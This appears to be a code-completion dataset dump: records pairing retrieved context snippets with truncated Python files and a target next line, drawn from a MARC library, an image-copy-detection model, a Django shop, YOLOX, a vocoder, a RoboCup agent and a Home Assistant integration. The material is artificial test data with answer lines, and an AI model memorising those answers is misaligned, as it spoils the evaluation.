"identifier": "crawl",
"path": "marctable/marc.py",
"snippet": "def crawl(n: int = 0, quiet: bool = False, outfile: IO = sys.stdout) -> None:\n marc = MARC()\n for f in fields():\n marc.fields.append(f)\n if not quiet:\n print(f)\n if n != 0 and len(marc.fields) >= n:\n break\n marc.to_avram(outfile)"
},
{
"identifier": "_mapping",
"path": "marctable/utils.py",
"snippet": "def _mapping(rules: list) -> dict:\n \"\"\"\n unpack the mapping rules into a dictionary for easy lookup\n\n >>> _mapping([\"245\", \"260ac\"])\n {'245': None, '260': ['a', 'c']}\n \"\"\"\n marc = MARC.from_avram()\n if rules is None or len(rules) == 0:\n rules = [field.tag for field in marc.fields]\n\n m = {}\n for rule in rules:\n field_tag = rule[0:3]\n if marc.get_field(field_tag) is None:\n raise Exception(f\"unknown MARC field in mapping rule: {rule}\")\n\n subfields = set(list(rule[3:]))\n for subfield_code in subfields:\n if marc.get_subfield(field_tag, subfield_code) is None:\n raise Exception(f\"unknown MARC subfield in mapping rule: {rule}\")\n\n m[field_tag] = subfields or None\n\n return m"
},
{
"identifier": "dataframe_iter",
"path": "marctable/utils.py",
"snippet": "def dataframe_iter(\n marc_input: BinaryIO, rules: list = [], batch: int = 1000\n) -> Generator[DataFrame, None, None]:\n columns = _columns(_mapping(rules))\n for records_batch in records_iter(marc_input, rules, batch):\n yield DataFrame.from_records(records_batch, columns=columns)"
},
{
"identifier": "to_csv",
"path": "marctable/utils.py",
"snippet": "def to_csv(\n marc_input: BinaryIO,\n csv_output: TextIO,\n rules: list = [],\n batch: int = 1000,\n) -> None:\n \"\"\"\n Convert MARC to CSV.\n \"\"\"\n first_batch = True\n for df in dataframe_iter(marc_input, rules=rules, batch=batch):\n df.to_csv(csv_output, header=first_batch, index=False)\n first_batch = False"
},
{
"identifier": "to_dataframe",
"path": "marctable/utils.py",
"snippet": "def to_dataframe(marc_input: BinaryIO, rules: list = []) -> DataFrame:\n \"\"\"\n Return a single DataFrame for the entire dataset.\n \"\"\"\n return next(dataframe_iter(marc_input, rules, batch=0))"
},
{
"identifier": "to_parquet",
"path": "marctable/utils.py",
"snippet": "def to_parquet(\n marc_input: BinaryIO,\n parquet_output: IOBase,\n rules: list = [],\n batch: int = 1000,\n) -> None:\n \"\"\"\n Convert MARC to Parquet.\n \"\"\"\n schema = _make_parquet_schema(rules)\n writer = ParquetWriter(parquet_output, schema, compression=\"SNAPPY\")\n for records_batch in records_iter(marc_input, rules=rules, batch=batch):\n table = pyarrow.Table.from_pylist(records_batch, schema)\n writer.write_table(table)\n\n writer.close()"
}
] | import json
import pathlib
import pandas
from io import StringIO
from marctable.marc import MARC, SchemaFieldError, SchemaSubfieldError, crawl
from marctable.utils import _mapping, dataframe_iter, to_csv, to_dataframe, to_parquet
from pytest import raises | 1,565 |
marc = MARC.from_avram()
def test_crawl() -> None:
# crawl the first 10 field definitions from the loc site (to save time)
outfile = StringIO()
crawl(10, quiet=True, outfile=outfile)
outfile.seek(0)
# ensure the Avram JSON parses and looks ok
schema = json.load(outfile)
assert schema
assert len(schema["fields"]) == 10
# ensure that the Avram JSON for a field looks ok
assert schema["fields"]["015"]
f015 = schema["fields"]["015"]
assert f015["label"] == "National Bibliography Number"
assert f015["url"] == "https://www.loc.gov/marc/bibliographic/bd015.html"
assert len(f015["subfields"]) == 6
# ensure that the Avram JSON for a subfield looks ok
assert f015["subfields"]["2"]
f0152 = f015["subfields"]["2"]
assert f0152["label"] == "Source"
assert f0152["code"] == "2"
assert f0152["repeatable"] is False
def test_marc() -> None:
assert len(marc.fields) == 215
def test_get_field() -> None:
assert marc.get_field("245")
|
marc = MARC.from_avram()
def test_crawl() -> None:
# crawl the first 10 field definitions from the loc site (to save time)
outfile = StringIO()
crawl(10, quiet=True, outfile=outfile)
outfile.seek(0)
# ensure the Avram JSON parses and looks ok
schema = json.load(outfile)
assert schema
assert len(schema["fields"]) == 10
# ensure that the Avram JSON for a field looks ok
assert schema["fields"]["015"]
f015 = schema["fields"]["015"]
assert f015["label"] == "National Bibliography Number"
assert f015["url"] == "https://www.loc.gov/marc/bibliographic/bd015.html"
assert len(f015["subfields"]) == 6
# ensure that the Avram JSON for a subfield looks ok
assert f015["subfields"]["2"]
f0152 = f015["subfields"]["2"]
assert f0152["label"] == "Source"
assert f0152["code"] == "2"
assert f0152["repeatable"] is False
def test_marc() -> None:
assert len(marc.fields) == 215
def test_get_field() -> None:
assert marc.get_field("245") | with raises(SchemaFieldError, match="abc is not a defined field tag in Avram"): | 1 | 2023-12-21 21:14:29+00:00 | 2k |
WangWenhao0716/ViT4ICD | Stage_23/dg/models_gem_waveblock_balance_cos/resnet_ibn.py | [
{
"identifier": "resnet50_ibn_a",
"path": "Stage_23/dg/models_gem_waveblock_balance_cos/resnet_ibn_a.py",
"snippet": "def resnet50_ibn_a(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-50 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)\n if pretrained:\n print(\"Loading a pre-trained model!\")\n state_dict = torch.load(model_urls['ibn_resnet50a'], map_location=torch.device('cpu'))['state_dict']\n state_dict = remove_module_key(state_dict)\n model.load_state_dict(state_dict)\n return model"
},
{
"identifier": "resnet101_ibn_a",
"path": "Stage_23/dg/models_gem_waveblock_balance_cos/resnet_ibn_a.py",
"snippet": "def resnet101_ibn_a(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-101 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(Bottleneck, [3, 4, 23, 3], **kwargs)\n if pretrained:\n state_dict = torch.load(model_urls['ibn_resnet101a'], map_location=torch.device('cpu'))['state_dict']\n state_dict = remove_module_key(state_dict)\n model.load_state_dict(state_dict)\n return model"
},
{
"identifier": "GeneralizedMeanPoolingP",
"path": "Stage_23/dg/models_gem_waveblock_balance_cos/gem.py",
"snippet": "class GeneralizedMeanPoolingP(GeneralizedMeanPooling):\n \"\"\" Same, but norm is trainable\n \"\"\"\n\n def __init__(self, norm=3, output_size=1, eps=1e-6):\n super(GeneralizedMeanPoolingP, self).__init__(norm, output_size, eps)\n self.p = nn.Parameter(torch.ones(1) * norm)"
},
{
"identifier": "build_metric",
"path": "Stage_23/dg/models_gem_waveblock_balance_cos/metric.py",
"snippet": "def build_metric(loss_type, in_dim, out_dim, s=64, m=0.35, **kwargs):\n if (loss_type=='circle'):\n return CircleLoss(in_dim, out_dim, s, m)\n elif (loss_type=='arc'):\n return Arcface(in_dim, out_dim, s, m)\n elif (loss_type=='cos'):\n return MarginCosineProduct(in_dim, out_dim, s, m)\n elif (loss_type=='am'):\n return AMSoftmax(in_dim, out_dim, s, m)\n else:\n assert \"Unknown metric {}\".format(loss_type)"
}
] | from torch import nn
from torch.nn import functional as F
from torch.nn import init
from .resnet_ibn_a import resnet50_ibn_a, resnet101_ibn_a
from .gem import GeneralizedMeanPoolingP
from .metric import build_metric
import torchvision
import torch
import random | 827 | from __future__ import absolute_import
__all__ = ['ResNetIBN', 'resnet_ibn50a', 'resnet_ibn101a']
class Waveblock(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
if self.training:
h, w = x.size()[-2:]
rh = round(0.3 * h)
sx = random.randint(0, h-rh)
mask = (x.new_ones(x.size()))*1.5
mask[:, :, sx:sx+rh, :] = 1
x = x * mask
return x
class ResNetIBN(nn.Module):
__factory = {
| from __future__ import absolute_import
__all__ = ['ResNetIBN', 'resnet_ibn50a', 'resnet_ibn101a']
class Waveblock(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
if self.training:
h, w = x.size()[-2:]
rh = round(0.3 * h)
sx = random.randint(0, h-rh)
mask = (x.new_ones(x.size()))*1.5
mask[:, :, sx:sx+rh, :] = 1
x = x * mask
return x
class ResNetIBN(nn.Module):
__factory = { | '50a': resnet50_ibn_a, | 0 | 2023-12-17 11:32:48+00:00 | 2k |
Noubissie237/myShop | myShop/shop/views.py | [
{
"identifier": "commandeAnonyme",
"path": "myShop/shop/utiles.py",
"snippet": "def commandeAnonyme(request, data):\n print(\"utilisateur non authentifie\")\n\n print('cookies', request.COOKIES)\n \n name = data['form']['name']\n print('data', data)\n print('name', name)\n username = data['form']['username']\n email = data['form']['email']\n phone = data['form']['phone']\n\n cookie_panier = panier_cookie(request)\n articles = cookie_panier['articles']\n\n client, created = Client.objects.get_or_create(\n email = email\n )\n \n client.name = name\n client.save()\n\n\n commande = Commande.objects.create(\n client=client\n )\n\n for article in articles:\n produit = Produit.objects.get(id=article['produit']['id'])\n\n CommandeArticle.objects.create(\n produit=produit,\n commande = commande,\n quantite = article['quantite']\n )\n\n return client, commande"
},
{
"identifier": "data_cookie",
"path": "myShop/shop/utiles.py",
"snippet": "def data_cookie(request):\n\n if request.user.is_authenticated:\n\n client = request.user.client\n\n commande, created = Commande.objects.get_or_create(client=client, complete=False)\n\n articles = commande.commandearticle_set.all()\n\n \n nombre_article = commande.get_panier_article\n\n else:\n \n cookie_panier = panier_cookie(request)\n articles = cookie_panier['articles']\n commande = cookie_panier['commande']\n nombre_article = cookie_panier['nombre_article']\n\n context = {\n 'articles': articles,\n 'commande': commande,\n 'nombre_article': nombre_article\n }\n\n return context"
},
{
"identifier": "panier_cookie",
"path": "myShop/shop/utiles.py",
"snippet": "def panier_cookie(request):\n try: \n panier = json.loads(request.COOKIES.get('panier'))\n except:\n panier = {} \n\n articles = []\n\n commande = {\n 'get_panier_total':0,\n 'get_panier_article':0,\n 'produit_physique':False,\n }\n\n nombre_article = commande['get_panier_article']\n try:\n\n for obj in panier:\n nombre_article += panier[obj]['qte']\n\n produit = Produit.objects.get(id=obj)\n\n total = (produit.price * panier[obj]['qte'])\n\n commande['get_panier_article'] += panier[obj]['qte']\n\n commande['get_panier_total'] += total\n\n article = {\n 'produit':{\n 'id': produit.id,\n 'name': produit.name,\n 'price': produit.price,\n 'imageUrl': produit.imageUrl\n },\n\n 'quantite': panier[obj]['qte'],\n 'get_total': total\n }\n\n articles.append(article)\n\n if produit.digital == False:\n commande['produit_physique'] = True\n \n except:\n pass \n\n context = {\n 'articles': articles,\n 'commande': commande,\n 'nombre_article': nombre_article\n } \n\n return context"
}
] | from django.shortcuts import render
from .models import *
from django.http import JsonResponse
from datetime import datetime
from .utiles import commandeAnonyme, data_cookie, panier_cookie
import json | 1,373 |
def shop(request, *args, **kwargs):
""" vue principale """
produits = Produit.objects.all()
data = data_cookie(request)
nombre_article = data['nombre_article']
context = {
'produits':produits,
'nombre_article': nombre_article
}
return render(request, 'shop/index.html', context)
def panier(request, *args, **kwargs):
""" panier """
data = data_cookie(request)
articles = data['articles']
commande = data['commande']
nombre_article = data['nombre_article']
context = {
'articles':articles,
'commande':commande,
'nombre_article':nombre_article
}
return render(request, 'shop/panier.html', context)
def commande(request, *args, **kwargs):
""" Commande """
data = data_cookie(request)
articles = data['articles']
commande = data['commande']
nombre_article = data['nombre_article']
context = {
'articles':articles,
'commande':commande,
'nombre_article': nombre_article
}
return render(request, 'shop/commande.html', context)
def update_article(request, *args, **kwargs):
data = json.loads(request.body)
produit_id = data['produit_id']
action = data['action']
client = request.user.client
produit = Produit.objects.get(id=produit_id)
commande, created = Commande.objects.get_or_create(client=client, complete=False)
commande_article, created = CommandeArticle.objects.get_or_create(commande=commande, produit=produit)
if action == 'add':
commande_article.quantite += 1
if action == 'remove':
commande_article.quantite -= 1
commande_article.save()
if commande_article.quantite <= 0:
commande_article.delete()
return JsonResponse("Article ajouté", safe=False)
def traitementCommande(request, *args, **kwargs):
""" traitement, validation de la com;ande et verification de l'integrite des donnees(detection de fraude)"""
STATUS_TRANSACTION = ['ACCEPTED', 'COMPLETED', 'SUCESS']
transaction_id = datetime.now().timestamp()
data = json.loads(request.body)
print(data)
if request.user.is_authenticated:
client = request.user.client
commande, created = Commande.objects.get_or_create(client=client, complete=False)
else:
|
def shop(request, *args, **kwargs):
""" vue principale """
produits = Produit.objects.all()
data = data_cookie(request)
nombre_article = data['nombre_article']
context = {
'produits':produits,
'nombre_article': nombre_article
}
return render(request, 'shop/index.html', context)
def panier(request, *args, **kwargs):
""" panier """
data = data_cookie(request)
articles = data['articles']
commande = data['commande']
nombre_article = data['nombre_article']
context = {
'articles':articles,
'commande':commande,
'nombre_article':nombre_article
}
return render(request, 'shop/panier.html', context)
def commande(request, *args, **kwargs):
""" Commande """
data = data_cookie(request)
articles = data['articles']
commande = data['commande']
nombre_article = data['nombre_article']
context = {
'articles':articles,
'commande':commande,
'nombre_article': nombre_article
}
return render(request, 'shop/commande.html', context)
def update_article(request, *args, **kwargs):
data = json.loads(request.body)
produit_id = data['produit_id']
action = data['action']
client = request.user.client
produit = Produit.objects.get(id=produit_id)
commande, created = Commande.objects.get_or_create(client=client, complete=False)
commande_article, created = CommandeArticle.objects.get_or_create(commande=commande, produit=produit)
if action == 'add':
commande_article.quantite += 1
if action == 'remove':
commande_article.quantite -= 1
commande_article.save()
if commande_article.quantite <= 0:
commande_article.delete()
return JsonResponse("Article ajouté", safe=False)
def traitementCommande(request, *args, **kwargs):
""" traitement, validation de la com;ande et verification de l'integrite des donnees(detection de fraude)"""
STATUS_TRANSACTION = ['ACCEPTED', 'COMPLETED', 'SUCESS']
transaction_id = datetime.now().timestamp()
data = json.loads(request.body)
print(data)
if request.user.is_authenticated:
client = request.user.client
commande, created = Commande.objects.get_or_create(client=client, complete=False)
else: | client, commande = commandeAnonyme(request, data) | 0 | 2023-12-15 08:06:59+00:00 | 2k |
alibaba/u2mot | yolox/models/yolo_fpn.py | [
{
"identifier": "Darknet",
"path": "yolox/models/darknet.py",
"snippet": "class Darknet(nn.Module):\n # number of blocks from dark2 to dark5.\n depth2blocks = {21: [1, 2, 2, 1], 53: [2, 8, 8, 4]}\n\n def __init__(\n self,\n depth,\n in_channels=3,\n stem_out_channels=32,\n out_features=(\"dark3\", \"dark4\", \"dark5\"),\n ):\n \"\"\"\n Args:\n depth (int): depth of darknet used in model, usually use [21, 53] for this param.\n in_channels (int): number of input channels, for example, use 3 for RGB image.\n stem_out_channels (int): number of output chanels of darknet stem.\n It decides channels of darknet layer2 to layer5.\n out_features (Tuple[str]): desired output layer name.\n \"\"\"\n super().__init__()\n assert out_features, \"please provide output features of Darknet\"\n self.out_features = out_features\n self.stem = nn.Sequential(\n BaseConv(in_channels, stem_out_channels, ksize=3, stride=1, act=\"lrelu\"),\n *self.make_group_layer(stem_out_channels, num_blocks=1, stride=2),\n )\n in_channels = stem_out_channels * 2 # 64\n\n num_blocks = Darknet.depth2blocks[depth]\n # create darknet with `stem_out_channels` and `num_blocks` layers.\n # to make model structure more clear, we don't use `for` statement in python.\n self.dark2 = nn.Sequential(\n *self.make_group_layer(in_channels, num_blocks[0], stride=2)\n )\n in_channels *= 2 # 128\n self.dark3 = nn.Sequential(\n *self.make_group_layer(in_channels, num_blocks[1], stride=2)\n )\n in_channels *= 2 # 256\n self.dark4 = nn.Sequential(\n *self.make_group_layer(in_channels, num_blocks[2], stride=2)\n )\n in_channels *= 2 # 512\n\n self.dark5 = nn.Sequential(\n *self.make_group_layer(in_channels, num_blocks[3], stride=2),\n *self.make_spp_block([in_channels, in_channels * 2], in_channels * 2),\n )\n\n def make_group_layer(self, in_channels: int, num_blocks: int, stride: int = 1):\n \"starts with conv layer then has `num_blocks` `ResLayer`\"\n return [\n BaseConv(in_channels, in_channels * 2, ksize=3, stride=stride, act=\"lrelu\"),\n *[(ResLayer(in_channels * 2)) for _ in range(num_blocks)],\n ]\n\n def make_spp_block(self, filters_list, in_filters):\n m = nn.Sequential(\n *[\n BaseConv(in_filters, filters_list[0], 1, stride=1, act=\"lrelu\"),\n BaseConv(filters_list[0], filters_list[1], 3, stride=1, act=\"lrelu\"),\n SPPBottleneck(\n in_channels=filters_list[1],\n out_channels=filters_list[0],\n activation=\"lrelu\",\n ),\n BaseConv(filters_list[0], filters_list[1], 3, stride=1, act=\"lrelu\"),\n BaseConv(filters_list[1], filters_list[0], 1, stride=1, act=\"lrelu\"),\n ]\n )\n return m\n\n def forward(self, x):\n outputs = {}\n x = self.stem(x)\n outputs[\"stem\"] = x\n x = self.dark2(x)\n outputs[\"dark2\"] = x\n x = self.dark3(x)\n outputs[\"dark3\"] = x\n x = self.dark4(x)\n outputs[\"dark4\"] = x\n x = self.dark5(x)\n outputs[\"dark5\"] = x\n return {k: v for k, v in outputs.items() if k in self.out_features}"
},
{
"identifier": "BaseConv",
"path": "yolox/models/network_blocks.py",
"snippet": "class BaseConv(nn.Module):\n \"\"\"A Conv2d -> Batchnorm -> silu/leaky relu block\"\"\"\n\n def __init__(\n self, in_channels, out_channels, ksize, stride, groups=1, bias=False, act=\"silu\"\n ):\n super().__init__()\n # use same padding\n pad = (ksize - 1) // 2\n self.conv = nn.Conv2d(\n in_channels,\n out_channels,\n kernel_size=ksize,\n stride=stride,\n padding=pad,\n groups=groups,\n bias=bias,\n )\n self.bn = nn.BatchNorm2d(out_channels)\n self.act = get_activation(act, inplace=True)\n\n def forward(self, x):\n '''\n x --> Conv2d --> BN --> activation --> x\n '''\n return self.act(self.bn(self.conv(x))) # Conv ==> BN ==> activate\n\n def fuseforward(self, x):\n return self.act(self.conv(x))"
}
] | import torch
import torch.nn as nn
from .darknet import Darknet
from .network_blocks import BaseConv | 1,525 | #!/usr/bin/env python3
# -*- encoding:utf-8 -*-
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
# Copyright (c) Alibaba, Inc. and its affiliates.
class YOLOFPN(nn.Module):
"""
YOLOFPN module. Darknet 53 is the default backbone of this model.
"""
def __init__(
self,
depth=53,
in_features=["dark3", "dark4", "dark5"],
):
super().__init__()
self.backbone = Darknet(depth)
self.in_features = in_features
# out 1
self.out1_cbl = self._make_cbl(512, 256, 1)
self.out1 = self._make_embedding([256, 512], 512 + 256)
# out 2
self.out2_cbl = self._make_cbl(256, 128, 1)
self.out2 = self._make_embedding([128, 256], 256 + 128)
# upsample
self.upsample = nn.Upsample(scale_factor=2, mode="nearest")
def _make_cbl(self, _in, _out, ks):
| #!/usr/bin/env python3
# -*- encoding:utf-8 -*-
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
# Copyright (c) Alibaba, Inc. and its affiliates.
class YOLOFPN(nn.Module):
"""
YOLOFPN module. Darknet 53 is the default backbone of this model.
"""
def __init__(
self,
depth=53,
in_features=["dark3", "dark4", "dark5"],
):
super().__init__()
self.backbone = Darknet(depth)
self.in_features = in_features
# out 1
self.out1_cbl = self._make_cbl(512, 256, 1)
self.out1 = self._make_embedding([256, 512], 512 + 256)
# out 2
self.out2_cbl = self._make_cbl(256, 128, 1)
self.out2 = self._make_embedding([128, 256], 256 + 128)
# upsample
self.upsample = nn.Upsample(scale_factor=2, mode="nearest")
def _make_cbl(self, _in, _out, ks): | return BaseConv(_in, _out, ks, stride=1, act="lrelu") | 1 | 2023-12-18 10:04:40+00:00 | 2k |
liuhuang31/HiFTNet-sr | models.py | [
{
"identifier": "init_weights",
"path": "utils.py",
"snippet": "def init_weights(m, mean=0.0, std=0.01):\n classname = m.__class__.__name__\n if classname.find(\"Conv\") != -1:\n m.weight.data.normal_(mean, std)"
},
{
"identifier": "get_padding",
"path": "utils.py",
"snippet": "def get_padding(kernel_size, dilation=1):\n return int((kernel_size*dilation - dilation)/2)"
},
{
"identifier": "TorchSTFT",
"path": "stft.py",
"snippet": "class TorchSTFT(torch.nn.Module):\n def __init__(self, filter_length=800, hop_length=200, win_length=800, window='hann'):\n super().__init__()\n self.filter_length = filter_length\n self.hop_length = hop_length\n self.win_length = win_length\n self.window = torch.from_numpy(get_window(window, win_length, fftbins=True).astype(np.float32))\n\n def transform(self, input_data):\n forward_transform = torch.stft(\n input_data,\n self.filter_length, self.hop_length, self.win_length, window=self.window.to(input_data.device),\n return_complex=True)\n\n return torch.abs(forward_transform), torch.angle(forward_transform)\n\n def inverse(self, magnitude, phase):\n inverse_transform = torch.istft(\n magnitude * torch.exp(phase * 1j),\n self.filter_length, self.hop_length, self.win_length, window=self.window.to(magnitude.device))\n\n return inverse_transform.unsqueeze(-2) # unsqueeze to stay consistent with conv_transpose1d implementation\n\n def forward(self, input_data):\n self.magnitude, self.phase = self.transform(input_data)\n reconstruction = self.inverse(self.magnitude, self.phase)\n return reconstruction"
}
] | import torch
import torch.nn.functional as F
import torch.nn as nn
import numpy as np
from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d
from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm
from utils import init_weights, get_padding
from stft import TorchSTFT | 645 |
LRELU_SLOPE = 0.1
class ResBlock1(torch.nn.Module):
def __init__(self, h, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.h = h
self.convs1 = nn.ModuleList([
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2])))
])
|
LRELU_SLOPE = 0.1
class ResBlock1(torch.nn.Module):
def __init__(self, h, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.h = h
self.convs1 = nn.ModuleList([
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]))),
weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2])))
]) | self.convs1.apply(init_weights) | 0 | 2023-12-16 03:53:55+00:00 | 2k |
m-abr/FCPCodebase | behaviors/custom/Step/Step.py | [
{
"identifier": "Base_Agent",
"path": "agent/Base_Agent.py",
"snippet": "class Base_Agent():\n all_agents = []\n\n def __init__(self, host:str, agent_port:int, monitor_port:int, unum:int, robot_type:int, team_name:str, enable_log:bool=True,\n enable_draw:bool=True, apply_play_mode_correction:bool=True, wait_for_server:bool=True, hear_callback=None) -> None:\n\n self.radio = None # hear_message may be called during Server_Comm instantiation\n self.logger = Logger(enable_log, f\"{team_name}_{unum}\")\n self.world = World(robot_type, team_name, unum, apply_play_mode_correction, enable_draw, self.logger, host)\n self.world_parser = World_Parser(self.world, self.hear_message if hear_callback is None else hear_callback)\n self.scom = Server_Comm(host,agent_port,monitor_port,unum,robot_type,team_name,self.world_parser,self.world,Base_Agent.all_agents,wait_for_server)\n self.inv_kinematics = Inverse_Kinematics(self.world.robot)\n self.behavior = Behavior(self)\n self.path_manager = Path_Manager(self.world)\n self.radio = Radio(self.world, self.scom.commit_announcement)\n self.behavior.create_behaviors()\n Base_Agent.all_agents.append(self)\n\n @abstractmethod\n def think_and_send(self):\n pass\n\n def hear_message(self, msg:bytearray, direction, timestamp:float) -> None:\n if direction != \"self\" and self.radio is not None:\n self.radio.receive(msg)\n\n def terminate(self):\n # close shared monitor socket if this is the last agent on this thread\n self.scom.close(close_monitor_socket=(len(Base_Agent.all_agents)==1))\n Base_Agent.all_agents.remove(self)\n\n @staticmethod\n def terminate_all():\n for o in Base_Agent.all_agents:\n o.scom.close(True) # close shared monitor socket, if it exists\n Base_Agent.all_agents = []"
},
{
"identifier": "Step_Generator",
"path": "behaviors/custom/Step/Step_Generator.py",
"snippet": "class Step_Generator():\n GRAVITY = 9.81\n Z0 = 0.2\n \n def __init__(self, feet_y_dev, sample_time, max_ankle_z) -> None:\n self.feet_y_dev = feet_y_dev\n self.sample_time = sample_time\n self.state_is_left_active = False\n self.state_current_ts = 0\n self.switch = False # switch legs\n self.external_progress = 0 # non-overlaped progress\n self.max_ankle_z = max_ankle_z\n\n\n def get_target_positions(self, reset, ts_per_step, z_span, z_extension):\n '''\n Get target positions for each foot\n\n Returns\n -------\n target : `tuple`\n (Left leg y, Left leg z, Right leg y, Right leg z)\n '''\n\n assert type(ts_per_step)==int and ts_per_step > 0, \"ts_per_step must be a positive integer!\"\n\n #-------------------------- Advance 1ts\n if reset:\n self.ts_per_step = ts_per_step # step duration in time steps\n self.swing_height = z_span\n self.max_leg_extension = z_extension # maximum distance between ankle to center of both hip joints\n self.state_current_ts = 0\n self.state_is_left_active = False \n self.switch = False\n elif self.switch:\n self.state_current_ts = 0\n self.state_is_left_active = not self.state_is_left_active # switch leg\n self.switch = False\n else:\n self.state_current_ts += 1\n\n #-------------------------- Compute COM.y\n W = math.sqrt(self.Z0/self.GRAVITY)\n\n step_time = self.ts_per_step * self.sample_time\n time_delta = self.state_current_ts * self.sample_time\n \n y0 = self.feet_y_dev # absolute initial y value\n y_swing = y0 + y0 * ( math.sinh((step_time - time_delta)/W) + math.sinh(time_delta/W) ) / math.sinh(-step_time/W)\n\n #-------------------------- Cap maximum extension and swing height\n z0 = min(-self.max_leg_extension, self.max_ankle_z) # capped initial z value\n zh = min(self.swing_height, self.max_ankle_z - z0) # capped swing height\n\n #-------------------------- Compute Z Swing\n progress = self.state_current_ts / self.ts_per_step\n self.external_progress = self.state_current_ts / (self.ts_per_step-1)\n active_z_swing = zh * math.sin(math.pi * progress)\n\n #-------------------------- Accept new parameters after final step\n if self.state_current_ts + 1 >= self.ts_per_step:\n self.ts_per_step = ts_per_step # step duration in time steps\n self.swing_height = z_span\n self.max_leg_extension = z_extension # maximum distance between ankle to center of both hip joints\n self.switch = True\n\n #-------------------------- Distinguish active leg\n if self.state_is_left_active:\n return y0+y_swing, active_z_swing+z0, -y0+y_swing, z0\n else:\n return y0-y_swing, z0, -y0-y_swing, active_z_swing+z0"
}
] | from agent.Base_Agent import Base_Agent
from behaviors.custom.Step.Step_Generator import Step_Generator
import numpy as np | 1,450 |
class Step():
def __init__(self, base_agent : Base_Agent) -> None:
self.world = base_agent.world
self.ik = base_agent.inv_kinematics
self.description = "Step (Skill-Set-Primitive)"
self.auto_head = True
nao_specs = self.ik.NAO_SPECS
self.leg_length = nao_specs[1] + nao_specs[3] # upper leg height + lower leg height
feet_y_dev = nao_specs[0] * 1.2 # wider step
sample_time = self.world.robot.STEPTIME
max_ankle_z = nao_specs[5]
# Initialize step generator with constants
|
class Step():
def __init__(self, base_agent : Base_Agent) -> None:
self.world = base_agent.world
self.ik = base_agent.inv_kinematics
self.description = "Step (Skill-Set-Primitive)"
self.auto_head = True
nao_specs = self.ik.NAO_SPECS
self.leg_length = nao_specs[1] + nao_specs[3] # upper leg height + lower leg height
feet_y_dev = nao_specs[0] * 1.2 # wider step
sample_time = self.world.robot.STEPTIME
max_ankle_z = nao_specs[5]
# Initialize step generator with constants | self.step_generator = Step_Generator(feet_y_dev, sample_time, max_ankle_z) | 1 | 2023-12-16 23:40:23+00:00 | 2k |
koenhendriks/ha-button-plus | custom_components/button_plus/buttonplushub.py | [
{
"identifier": "LocalApiClient",
"path": "custom_components/button_plus/button_plus_api/local_api_client.py",
"snippet": "class LocalApiClient:\n \"\"\" Client to talk to Button+ local devices \"\"\"\n\n def __init__(self, ip_address, session) -> None:\n self._base = f\"http://{ip_address}\"\n self._session = session\n\n _LOGGER.debug(f\"Initialize Button+ local API client\")\n\n async def fetch_config(self):\n url = f\"{self._base}/config\"\n _LOGGER.debug(f\"fetch_config {url}\")\n async with self._session.get(url) as response:\n return await response.text()\n\n async def push_config(self, config):\n url = f\"{self._base}/configsave\"\n _LOGGER.debug(f\"push_config {url}\")\n async with self._session.post(url, data=config.to_json()) as response:\n return await response.text()"
},
{
"identifier": "DeviceConfiguration",
"path": "custom_components/button_plus/button_plus_api/model.py",
"snippet": "class DeviceConfiguration:\n def __init__(self, info: Info, core: Core, mqtt_buttons: List[MqttButton], mqtt_displays: List[MqttDisplay],\n mqtt_brokers: List[MqttBroker], mqtt_sensors: List[MqttSensor]):\n self.info = info\n self.core = core\n self.mqtt_buttons = mqtt_buttons\n self.mqtt_displays = mqtt_displays\n self.mqtt_brokers = mqtt_brokers\n self.mqtt_sensors = mqtt_sensors\n\n @staticmethod\n def from_json(json_data: str) -> 'DeviceConfiguration':\n data = json.loads(json_data)\n return DeviceConfiguration(\n info=Info.from_dict(data['info']),\n core=Core.from_dict(data['core']),\n mqtt_buttons=[MqttButton.from_dict(button) for button in data['mqttbuttons']],\n mqtt_displays=[MqttDisplay.from_dict(display) for display in data['mqttdisplays']],\n mqtt_brokers=[MqttBroker.from_dict(broker) for broker in data['mqttbrokers']],\n mqtt_sensors=[MqttSensor.from_dict(sensor) for sensor in data['mqttsensors']],\n )\n\n def to_json(self) -> str:\n def serialize(obj):\n if hasattr(obj, '__dict__'):\n d = obj.__dict__.copy()\n\n # Convert the root keys\n if isinstance(obj, DeviceConfiguration):\n d['mqttbuttons'] = [serialize(button) for button in d.pop('mqtt_buttons')]\n d['mqttdisplays'] = [serialize(display) for display in d.pop('mqtt_displays')]\n d['mqttbrokers'] = [serialize(broker) for broker in d.pop('mqtt_brokers')]\n d['mqttsensors'] = [serialize(sensor) for sensor in d.pop('mqtt_sensors')]\n\n if isinstance(obj, Info):\n d['id'] = d.pop('device_id')\n d['ipaddress'] = d.pop('ip_address')\n d['largedisplay'] = d.pop('large_display')\n\n elif isinstance(obj, Connector):\n d['id'] = d.pop('connector_id')\n d['type'] = d.pop('connector_type')\n\n elif isinstance(obj, Sensor):\n d['sensorid'] = d.pop('sensor_id')\n\n elif isinstance(obj, Core):\n d['autobackup'] = d.pop('auto_backup')\n d['brightnesslargedisplay'] = d.pop('brightness_large_display')\n d['brightnessminidisplay'] = d.pop('brightness_mini_display')\n d['ledcolorfront'] = 